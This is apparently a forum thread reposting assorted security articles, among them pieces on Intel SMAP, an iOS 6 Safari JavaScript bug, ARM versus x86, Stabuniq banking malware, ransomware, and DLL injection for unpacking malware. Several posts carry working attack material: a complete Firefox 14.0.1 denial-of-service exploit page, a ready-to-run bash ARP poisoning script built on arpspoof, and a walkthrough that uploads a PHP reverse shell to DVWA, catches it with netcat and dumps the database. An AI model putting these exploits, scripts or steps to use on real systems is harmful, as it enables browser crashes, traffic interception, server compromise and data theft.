Similarly to UDEREF, an SMAP enabled kernel will be prevented from accessing userland memory in unintended ways, e.g., attacker controlled pointers can no longer target userland memory directly, and even simple kernel bugs such as NULL pointer based dereferences will just trigger a CPU exception instead of letting the attacker take over kernel data flow. Coupled with SMEP, this means that future exploits against memory corruption bugs will have to rely entirely on targeting kernel memory (which has been the case under UDEREF/KERNEXEC for many years now). This of course means that for reliable exploitation, detailed knowledge of runtime kernel memory will become a premium, therefore abusing bugs that leak kernel memory to userland will become the first step towards exploiting memory corruption bugs. While UDEREF and SMAP prevent gratuitous memory leaks, they still have to allow intended userland accesses, and that is exactly the escape hatch that several exploits have already targeted, and we can expect more in the future. Fortunately we are once again at the forefront of this game, with several features that prevent or at least greatly reduce the amount of information that can be so leaked from the kernel to userland (HIDESYM, SANITIZE, SIZE_OVERFLOW, STACKLEAK, USERCOPY).
TL;DR: Intel implements UDEREF equivalent 6 years after PaX, PaX will make use of it on amd64 for improved performance. Sursa: grsecurity forums • View topic - Supervisor Mode Access Prevention
  11. iOS 6 Javascript Bug Raises Potential Security And Privacy Questions

By Istvan Fekete, last updated December 23, 2012

iOS 6 Safari has a potentially serious Javascript bug, which could have some serious security and privacy implications. According to a report from AppleInsider, users who toggle off Javascript in the iOS 6 Safari web browser are not totally in the clear. The appearance of a Smart App Banner, designed to give developers the ability to promote App Store software within Safari on a given website, automatically toggles Javascript back on without notifying the user.

You can check out this bug by opening up the Settings app, choosing Safari, and turning off Javascript. Then visit this test page using your iPhone's browser. As you will see, it will turn on Javascript without notifying you.

Peter Eckersley, technology products director with the digital rights advocacy group the Electronic Frontier Foundation, said he would characterize such an issue as a "serious privacy and security vulnerability." Neither Eckersley nor the EFF had heard of the bug in iOS 6, nor had they independently tested to confirm that they were able to replicate the issue. But Eckersley said that if the problem is in fact real, it's something that Apple should work to address as quickly as possible.

"It is a security issue, it is a privacy issue, and it is a trust issue," Eckersley said. "Can you trust the UI to do what you told it to do? It's certainly a bug that needs to be fixed urgently."

According to the report, this issue has existed ever since iOS 6 went public, and the recent updates iOS 6.0.1 and iOS 6.0.2 didn't patch it. Furthermore, the bug isn't iPhone specific: it applies to all iDevices running iOS 6, and even the iOS 6.1 beta seems to carry this bug as well.

Sursa: iOS 6 Javascript Bug Raises Potential Security And Privacy Questions | Jaxov
  12. The End of x86? An Update

by mjfern on December 21, 2012

In October 2010, I predicted the disruption of the x86 architecture, along with its major proponents Intel and AMD. The purpose of this current article is to reassess this prediction in light of recent events. Below, I present the classic signs of disruption (drawing on Christensen's framework), my original arguments in blockquotes, and then an update.

1. The current technology is overshooting the needs of the mass market.

Due to a development trajectory that has followed in lockstep with Moore's Law, and the emergence of cloud computing, the latest generation of x86 processors now exceeds the performance needs of the majority of customers. Because many customers are content with older generation microprocessors, they are holding on to their computers for longer periods of time, or if purchasing new computers, are seeking out machines that contain lower performing and less expensive microprocessors.

x86 shipments dropped by 9% in Q3 2012. Furthermore, the expected surge in PC sales (and x86 shipments) in Q4 due to the release of Windows 8 has failed to materialize. NPD data indicates that Windows PC sales in U.S. retail stores fell a staggering 21% in the four-week period from October 21 to November 17, compared to the same period the previous year. [1] In short, there is now falling demand for x86 processors. Computer buyers are shifting their spending from PCs to next generation computing devices, including smartphones and tablets.

2. A new technology emerges that excels on different dimensions of performance.

While the x86 architecture excels on processing power – the number of instructions handled within a given period of time – the ARM architecture excels at energy efficiency.
According to Data Respons (datarespons.com, 2010), an "ARM-based system typically uses as little as 2 watts, whereas a fully optimized Intel Atom solution uses 5 or 6 watts." The ARM architecture also has an advantage in form factor, enabling OEMs to design and produce smaller devices.

While Intel has closed the ARM energy efficiency gap with its latest x86 Atom processors, the latest generation ARM-based chips are outperforming their Atom counterparts. And the performance advantage of ARM-based processors is expected to hold through 2013. The ARM architecture also continues to maintain a significant advantage in the areas of customization, form factor, and price due to ARM Holdings' unique licensing-based business model. Because of these additional benefits of ARM technology, it's unlikely that Intel's energy efficiency gains will significantly affect its short-term market penetration.

3. Because this new technology excels on a different dimension of performance, it initially attracts a new market segment.

While x86 is the mainstay technology in PCs, the ARM processor has gained significant market share in the embedded systems and mobile devices markets. ARM-based processors are used in more than 95% of mobile phones (InformationWeek, 2010). And the ARM architecture is now the main choice for deployments of Google's Android and is the basis of Apple's A4 system on a chip, which is used in the latest generation iPod Touch and Apple TV, as well as the iPhone 4 and iPad.

ARM-based processors continue to dominate smartphones and tablets, with the ARM architecture maintaining a market share of 95% and 98%, respectively. [2] In the first half of 2012, there were just six phones with x86 chips inside (i.e., 0.2% of the worldwide market). And, as of December 2012, there was scarce availability of tablets with x86 processors. [3] A major concern going forward is that Intel is limiting tablet support to Windows 8.

4.
Once the new technology gains a foothold in a new market segment, further technology improvements enable it to move up-market, displacing the incumbent technology.

With its foothold in the embedded systems and mobile markets, ARM technology continues to improve. The latest generation ARM chip (the Cortex-A15) retains the energy efficiency of its predecessors, but has a clock speed of up to 2.5 GHz, making it competitive with Intel's chips from the standpoint of processing power. As evidence of ARM's move up-market, the startup Smooth-Stone recently raised $48m in venture funding to produce energy efficient, high performance chips based on ARM to be used in servers and data centers. I suspect we will begin seeing the ARM architecture in next generation laptops, netbooks, and smartphones (e.g., A4 in a MacBook Air).

ARM's latest Cortex-A15 processor is highly competitive with Intel's Atom line of processors. In a benchmarking analysis, "the [ARM-based] Samsung Exynos 5 Dual…easily beat out all of the tested Intel Atom processors." And while Intel's Core i3 processors outperformed the ARM-based processors, the Core i3's performance-per-watt makes it unsuitable for smartphones and tablets. Since energy conservation and cost is a growing concern among manufacturers, IT departments, and consumers, ARM-based chips are also moving upmarket into more demanding devices.

While ARM technology hasn't made much headway in traditional desktop PCs and laptops, it's been deployed in the latest generation Google Chromebook, produced by Samsung. It's also the processor of choice in Microsoft's Surface RT, which is arguably a hybrid device (PC and tablet) given it runs Windows and Office and has a keyboard. Furthermore, ARM's penetration of the server market is ushering in a new "microserver" era, with support from AMD, Calxeda, Dell, HP, Marvell, Samsung, Texas Instruments, and others (e.g., Applied Micro). [4]

5.
The new, disruptive technology looks financially unattractive to established companies, in part because they have a higher cost structure.

In 2009, Intel's costs of sales and operating expenses were a combined $29.6 billion. In contrast, ARM Holdings, the company that develops and supports the ARM architecture, had total expenses (cost of sales and operating) of $259 million. Unlike Intel, ARM does not produce and manufacture chips; instead it licenses its technology to OEMs and other parties, and the chips are often manufactured using a contract foundry (e.g., TSMC). Given ARM's low cost structure, and the competition in the foundry market, "ARM offers a considerably cheaper total solution than the x86 architecture can at present…" (datarespons.com, 2010). Intel is loath to follow ARM's licensing model because it would reduce Intel's revenues and profitability substantially.

In the first three quarters of 2012, Intel had revenue of $38.864 billion, operating expenses of $28.509b, and operating income of $11.355b. In contrast, ARM Holdings, with its licensing-based business model, had revenue of $886.88 million, operating expenses of $576.5m, and operating income of $307.12m. ARM Holdings has revenues and profits that are just a fraction (2-3%) of Intel's. This is the case even though ARM-based processors have a much greater share of the overall processor market. [5]

The smartphone and tablet markets, despite their sheer size and growth rates, are financially unattractive in comparison to the PC market. The price point and margins on processors in the mobile markets are significantly lower than those of higher-end PC and server processors.
For instance, as of November 2012, the “Atom processor division contribute[d] only around 2% to Intel’s valuation.” In short, the ARM architecture appears to be in the early stages of disrupting x86, not just in the mobile and embedded systems markets, but also in the personal computer and server markets, the strongholds of Intel and AMD. This is evidenced in part by investors’ expectations for ARM’s, Intel’s and AMD’s future performance in microprocessor markets: today ARM Holdings has a price to earnings ratio of 77.93, while Intel and AMD have price to earnings ratios of 10.63 and 4.26, respectively. It doesn’t appear Intel (or AMD) has solved the disruptive threat posed by ARM. The ARM architecture is maintaining its market share in smartphones and tablets, and gaining ground in upmarket devices, from hybrids (Chromebook and Surface RT) to servers. Investors concur with this assessment, as ARM Holdings has a price to earnings ratio of 70.74, while Intel has a price to earnings ratio of 9.22. [6] For Intel and AMD to avoid being disrupted, they must offer customers a microprocessor with comparable (or better) processing power and energy efficiency relative to the latest generation ARM chips, and offer this product to customers at the same (or lower) price point relative to the ARM license plus the costs of manufacturing using a contract foundry. The Intel Atom is a strong move in this direction, but the Atom is facing resistance in the mobile market and emerging thin device markets (e.g., tablets) due to concerns about its energy efficiency, form factor, and price point. While Intel has closed the energy efficiency gap with its latest Atom processors, it still lags in performance and hasn’t dealt with the issues of customization and form factor. It’s likely that its pricing also remains unattractive. 
Although I don’t have precise data on Intel or ARM’s pricing for comparable processors, one can get an estimate by comparing Intel’s listed processor prices with teardown data from iSuppli. According to this rough analysis, the latest Atom processors range in price from $42-$75, while ARM-based processors have prices (including manufacturing) in the $15-25 range. [7] Therefore, Intel would need to offer a 60%+ discount off list prices just to achieve parity. The x86 architecture is supported by a massive ecosystem of suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies. This turbulence is now real and visible. The major companies that make up the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel’s CEO, retired suddenly and unexpectedly, just last month. Intel, in particular, faces a precarious situation. It can harvest its tremendous profits in the PC market for the next several years or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holdings’ licensing-based business model. [7] It’s a choice between serving a known, highly profitable market (in the shorter-term) and possibly winning in a comparatively unknown, unprofitable market (in the longer-term). As a professional executive or manager, which option would you choose? 
Thus we have the innovator’s dilemma. — [1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year. [2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM-compatible CPU core for the iPhone 5 and iPad 4. [3] Intel reports having 20 tablets in its pipeline for launch by the end of this year. [4] Intel’s efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, have thus far underperformed expectations. [5] I wasn’t able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market. [6] AMD had a net loss in its latest quarter and thus you cannot compute a price to earnings ratio. [7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also have a significant drag on its margins and profitability. Sursa: The End of x86? An Update
  13. [Audio] Issues with Security and Networked Object Systems From the Hacker Jeopardy winning team. He will discuss issues with security and networked object systems, looking at some of the recent security issues found with ActiveX, and detail some of the potentials and problems with network objects. Topics will include development of objects, distributed objects, standards, ActiveX, CORBA, and hacking objects. Size 23.3 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  14. [Audio] Packet Sniffing He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, bpf) that different platforms provide to allow the hack Size 25.2 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
  15. [h=1]Security researchers identify malware infecting U.S. banks[/h] By Lucian Constantin, IDG News Service Dec 22, 2012 12:36 PM Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions. Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post. "Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions." Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas. Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which seems to suggest that its authors might have targeted specific individuals and organizations, Gutierrez said. The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. Once installed, the Stabuniq Trojan program collects information about the compromised computer, like its name, running processes, OS and service pack version, assigned IP (Internet Protocol) address and sends this information to command-and-control (C&C) servers operated by the attackers. 
"At this stage we believe the malware authors may simply be gathering information," Gutierrez said. Sursa: Security researchers identify malware infecting U.S. banks | PCWorld
  16. [h=1]The Social Impact of Malware Infections[/h]I just had a good experience today of the "social impact" of malware infections and I would like to share it with you. For most infosec people, it is part of the game to play fireman for family and friends when they are in trouble with their computer. The term "computer" is used by them generically and includes the hardware, the software, the Internet connectivity, mailboxes, etc. Today it was again my turn to be contacted by a friend who had received a "strange message" on his screen. That's typical too: people always see a "strange message" and don't even try to read and understand it! My wife picked up the call and said that my friend sounded very upset and asked me to call back asap… I quickly packed an emergency toolkit (a BackTrack on USB, some cables, USB sticks, a Windows DVD) and went to the front! Once I arrived, my friend was very happy to see me and explained that while surfing on "some websites", a message had suddenly popped up! To me, it did not look like a regular malware infection: those usually install themselves and operate silently. My attention was caught by some words while he was describing the problem: "Police", "They ask money", "pornographic website". OK, it's ransomware! I booted the laptop offline to reproduce the malicious behaviour and saw this nice screen: My friend and his wife were really very affected by this message and did not know how to react. They saw it as an intrusion into their private life. Worse, the displayed message referred to visits to child pornography websites! Of course, I was tempted to find the infection vector, which was certainly a compromised (or malicious) website, but my goal was also to respect my friend's privacy. I decided to simply get rid of the malware. Quite easy with this one: it's a common ransomware that just displays a pop-up window. There is no file encryption. 
I just booted in Emergency mode and reverted to the latest valid restore point. Case closed! Then I took some time to talk with them and realized how much this story had affected my friend (and his wife!). The infection happened Saturday evening. He did not sleep, he did not eat at all! He had 24 hours to pay 100 EUR and he spent the night with the following questions in mind: To pay or not to pay? Do I talk about this problem with my wife? I never visited child pornography websites, so how did they find this? Will the police catch me? Come to my house, seize my computer? How do I report that I'm not a criminal? Fortunately, he had the right reaction and called me "because I'm working with computers" (as mentioned in the introduction). But not all people know IT people who can provide free support. How will those people handle the same kind of issue? His wife also had a lot of questions: Does my husband really visit child pornography websites? Can I trust him again? Will the police catch him? These friends have been a couple for years and have a very stable life. Can you imagine the same story in a couple that already has social or financial problems? Or that wants to divorce? This could completely change the rules of the game. This story really proves that the bad guys play on human behaviour to catch victims! It's a pity that I did not find the website which delivered the malware, so I could not make a deeper analysis, but, once again, it's my friend's privacy! Let's put the social aspect aside now: why was he infected? Alas, nothing new, just the usual mistakes: Using the computer with administrator rights Outdated AV No backup It's amazing (in the right sense of the term) to see how such malware uses human weaknesses and feelings (stress, shame, ignorance, …) to successfully achieve its goal! Anyway, the case is closed for my friend. I'll just need to continue the awareness training from time to time! 
Sursa: The Social Impact of Malware Infections | /dev/random
  17. [h=3]Using DLL Injection to Automatically Unpack Malware[/h]In this post, I will present DLL injection by means of automatically unpacking malware. But first, the most important question: [h=2]What is DLL Injection and Reasons for Injecting a DLL[/h] DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code and good testability, you don't have to reinvent the wheel and do everything on your own. But why would you want to inject a DLL into a foreign process? There are lots of reasons to inject a DLL. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it from an injected DLL. Some showcases are: creation of cheats, trainers extracting passwords and encryption keys unpacking packed/encrypted executables To me, the opportunity of unpacking and decrypting malware is especially interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will briefly summarize how it works. [h=2]The Malware Packer[/h] In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuous-looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not so strongly as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it via self-modifying code. In the snippet below, you see how exactly the code is modified. 
The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code.

mov [ebp+var_1], 0F6h
mov al, [ebp+var_1]
mov ecx, ptr_to_function
xor al, 0A1h
sub al, 6Eh
mov [ecx], al ; =0xE9
mov ecx, ptr_to_function
...
mov [ecx+1], eax ; delta to decrypted code
...
call eax

As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Then it does some relocation (as the base address has changed) and executes the entry point of the executable. In the following code excerpt, you can see the generic calculation of the entry point:

mov edx, [ebp+newImageBase]
mov ecx, [edx+3Ch] ; e_lfanew
add ecx, edx ; get PE header
...
mov ebx, [ecx+28h] ; get AddressOfEntryPoint
add ebx, edx ; add imageBase
...
mov [ebp+vaOfEntryPoint], ebx
...
mov ebx, [ebp+vaOfEntryPoint]
...
call ebx

Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero.

mov eax, alreadyDecrypted
cmp eax, 6E6C82B7h
jnz dontInitialize
...
mov alreadyDecrypted, 0
dontInitialize:
...

In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet:

mov [ebp+const_0DF2EF03], 0DF2EF03h
mov edi, 75683572h
mov esi, 789ADA71h
mov eax, [ebp+const_0DF2EF03]
mov ecx, alreadyDecrypted
xor eax, edi
sub eax, esi
cmp eax, ecx ; eax = 0
jnz dontDecrypt

Once more, you see the obfuscation employed by the packer. 
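The opcode arithmetic above can be verified directly; here is a quick Python sanity check (all constants are copied verbatim from the disassembly):

```python
# patch byte: 0xF6 is XORed with 0xA1, then 0x6E is subtracted (mod 256)
patched = ((0xF6 ^ 0xA1) - 0x6E) & 0xFF
assert patched == 0xE9          # 0xE9 is the x86 near-jmp opcode

# "already decrypted" guard: the obfuscated 32-bit constants cancel out to zero,
# which is then compared against the zeroed alreadyDecrypted variable
eax = ((0x0DF2EF03 ^ 0x75683572) - 0x789ADA71) & 0xFFFFFFFF
assert eax == 0
```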
Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps:

gather chunks of the packed program from the executable memory space
BASE64-decode them
decompress the result
write it section by section to the original executable's memory space, effectively overwriting all of the original code
fix imports etc.

After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode.

Code at the OEP

[h=3]Weaknesses[/h] What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap, but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you could also write a static unpacker, and perhaps one of my future posts will deal with that. One of the largest weaknesses is the memory allocations and the setting of the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function, and the one setting the appropriate rights to the whole image space really sticks out. 
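The decode-then-decompress steps above can be mimicked in a few lines of Python. The post does not name the packer's compression algorithm, so zlib stands in here purely as an assumption for illustration:

```python
import base64
import zlib

def unpack_chunks(chunks):
    # concatenate the gathered chunks, BASE64-decode, then decompress
    blob = b"".join(chunks)
    return zlib.decompress(base64.b64decode(blob))

# round-trip demo with a stand-in "packed" payload
payload = b"MZ\x90\x00 stand-in for a PE image"
packed = base64.b64encode(zlib.compress(payload))
# the unpacker sees the encoded data scattered across several chunks
assert unpack_chunks([packed[:10], packed[10:]]) == payload
```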
After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but both seem unaware that the technique presented in the following is really easy to implement. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only; hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to the missing execution rights. Now that we know the correct location at which to break the packer, how do we unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple:

start the binary in suspended state
inject a DLL
this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place
as a backup, a hook on SetErrorMode is set, so that when encountering unknown packers, the binary won't be executed for too long
resume the process

Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-) It seems not too easy to find a decent DLL injector, especially one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector that is capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-) [h=3]Conclusion[/h] The presented technique works very well against the unpacker. So far, I've encountered about 50 samples and almost all can be unpacked using this technique. Furthermore, all packers that overwrite the original executable's image space can be unpacked by this technique. In future posts, I will evaluate this technique against other packers. 
Posted by Sebastian Eschweiler at 03:20 Sursa: Malware Muncher: Using DLL Injection to Automatically Unpack Malware
  18. Disabling Antivirus Program(s) Description: PDF: https://hacktivity.com/en/downloads/archives/185/ Bachelor's Degree in Computer Science from the Faculty of Software Engineering at the College of Nyiregyhaza. He has more than 9 years of experience in the field of IT security, mostly in designing and creating security-related products like DLP (data loss prevention) solutions and system log collectors. He was a developer of the widely known open source tool syslog-ng. Currently working as an IT security consultant and researcher at BDO MITM Kft. Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying. Original Source: Sursa: Disabling Antivirus Program(S)
  19. File Upload Exploitation File upload vulnerabilities constitute a major threat for web applications. A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell. Of course, a shell is always a goal, but a good penetration tester must not stop there. Further activities can be performed after obtaining the shell, and the focus of these activities must be on the database. In this article we will see how we can obtain a shell through the exploitation of a file upload on a Linux web server and how we can dump the database that is running on the system. BackTrack includes a variety of web shells for different technologies like PHP, ASP etc. In our example we will use the Damn Vulnerable Web Application, which is written in PHP, in order to attack the web server through the file upload. The web shell that we will use in our case will be the php-reverse-shell. uploading the web shell Now we have to set our machine to listen on the same port as our web shell. We can do this with netcat and the command nc -lvp 4444. The next step is to go back to the web application and try to access the URL where the PHP reverse shell exists. We will notice that it returns a shell to our console: Obtaining a shell So we have compromised the remote web server and we can execute further commands from our shell, like a simple ls in order to discover directories. Listing Directories Now it is time to dump the database. We will have to go to the directory with the name uploads, because this directory has write permissions and is visible to the outside world, which means that we can access it and create a file there. Then we can use the following command in order to dump the database to a file. 
mysqldump -u root -p dvwa > hacked_db.sql We already know that the user root exists because it is already logged into the system. Also, it is very common for the database name to be the name of the application or of the company, so we will use dvwa. The > sign will create a file inside the uploads directory with the name hacked_db.sql. Dumping the database to a file As we can see from the image above, we had to provide a password. In this scenario we just pressed enter without submitting anything. In a real-world penetration test it would be much more difficult; however, it is always good practice to try some of the common passwords. The next two images show the dump of the dvwa database. Dump of DVWA database Dump of DVWA database 2 From the last image we can see that we even obtain the password hash of the admin, which can be cracked by using a tool like John the Ripper. This is also important, as we may want to log into the application with admin privileges. Conclusion In this article we saw how we can obtain a shell by exploiting the file upload form of an application and how we can dump the database. Of course, in a real-world scenario it is more likely that restrictions will be in place, but it is good to know the methodology and the technique that we must follow once we have managed to upload our web shell. Sursa: File Upload Exploitation
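DVWA stores its passwords as unsalted MD5 hashes, so the John the Ripper step above boils down to hashing wordlist candidates and comparing. A minimal Python illustration (the wordlist here is just an example, not taken from the article's dump):

```python
import hashlib

def crack_md5(target_hash, wordlist):
    """Return the first candidate whose MD5 digest matches target_hash, else None."""
    for word in wordlist:
        if hashlib.md5(word.encode()).hexdigest() == target_hash:
            return word
    return None

# "password" is DVWA's well-known default admin credential
admin_hash = hashlib.md5(b"password").hexdigest()  # 5f4dcc3b5aa765d61d8327deb882cf99
assert crack_md5(admin_hash, ["123456", "letmein", "password"]) == "password"
```

Real tools apply the same idea with mangling rules and far larger wordlists, which is why unsalted fast hashes like MD5 fall quickly.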
  20. [h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]Author: knowlegend

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>FF-14.0.1 DoS-Exploit by Know v3.0</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" />
<script type="text/javascript" language="JavaScript">
var CrashIt = false;
if (typeof CrashIt != 'undefined') {
    CrashIt = new XMLHttpRequest();
}
if (!CrashIt) {
    try {
        CrashIt = new ActiveXObject("Msxml2.XMLHTTP");
    } catch(e) {
        try {
            CrashIt = new ActiveXObject("Microsoft.XMLHTTP");
        } catch(e) {
            CrashIt = null;
        }
    }
}
function load() {
    CrashIt.open('get','bla.php');
    CrashIt.onreadystatechange = handleContent;
    CrashIt.send(null);
    return false;
}
function handleContent() {
    while(CrashIt.readyState != 4) {
        document.getElementById('inhalt').innerHTML = "pwnd";
    }
    document.getElementById('inhalt').innerHTML = CrashIt.responseText;
}
</script>
</head>
<body onload="load();">
<div id="inhalt"></div>
</body>
</html>

# 1337day.com [2012-12-23] Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  21. [h=3]Fast Network Cracker Hydra v7.4[/h] One of the biggest security holes is passwords, as every password security study shows. THC-Hydra, a very fast network logon cracker which supports many different services, has now been updated to version 7.4. Hydra is available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, and currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Change Log
New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!)
Added support for win8 and win2012 server to the RDP module
Better target distribution if -M is used
Added colored output (needs libcurses)
Better library detection for current Cygwin and OS X
Fixed the -W option
Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested
Fixed HTTP Form module false positive when no answer was received from the server
Fixed SMB module return code for invalid hours logon and LM auth disabled
Fixed http-{get|post-form} from xhydra
Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz)
Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-)
Added debug mode option to usage (thanks to Anold Black)
Download THC-Hydra 7.4 Sursa: Fast Network cracker Hydra v 7.4 updated version download - Hacker News , Security updates
  22. Arachni Web Application Security Scanner Framework Web application hacking is very common and there are many tools that can exploit web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The very first step is to find the vulnerabilities in the web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install Arachni and how to launch your first attack against a web application. Download Arachni. I am on BackTrack 5 R1, but you can use another Linux distribution like Ubuntu. Start the web interface of Arachni: root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web Next you need to start the Dispatchers of Arachni, because without dispatchers Arachni does not work: root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd Now click on the plugins to choose the ones you want, then click on the modules to select and unselect modules depending on your needs. Finally, click on start scan to run your first scan, enter the URL of the target web application, then simply start the attack; after some time you can evaluate the report to find the vulnerabilities. Sursa: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
  23. What is that "mc"?
  24. [h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poisoning attacks. The attacker must only enter the IP address of the target and the IP of the gateway. This script was coded by Travis Phillips and you can find the source code below:

#!/bin/bash
niccard=eth1
if [[ $EUID -ne 0 ]]; then
   echo -e "\n\t\t\t\033[1m \033[31m Script must be run as root! \033[0m \n"
   echo -e "\t\t\t Example: sudo $0 \n"
   exit 1
else
   echo -e "\n\033[1;32m#######################################"
   echo -e "# ARP Poison Script #"
   echo -e "#######################################"
   echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
   echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
   echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
   echo -n "Please enter target's IP: "
   read victimIP
   echo -n "Please enter Gateway's IP: "
   read gatewayIP
   echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
   echo -e "\t\t--==[Targets]==--"
   echo -e "\t\tTarget: $victimIP"
   echo -e "\t\tGateway: $gatewayIP \n\n"
   echo -e " [*] Enabling IP Forwarding \n"
   echo "1" > /proc/sys/net/ipv4/ip_forward
   echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
   xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

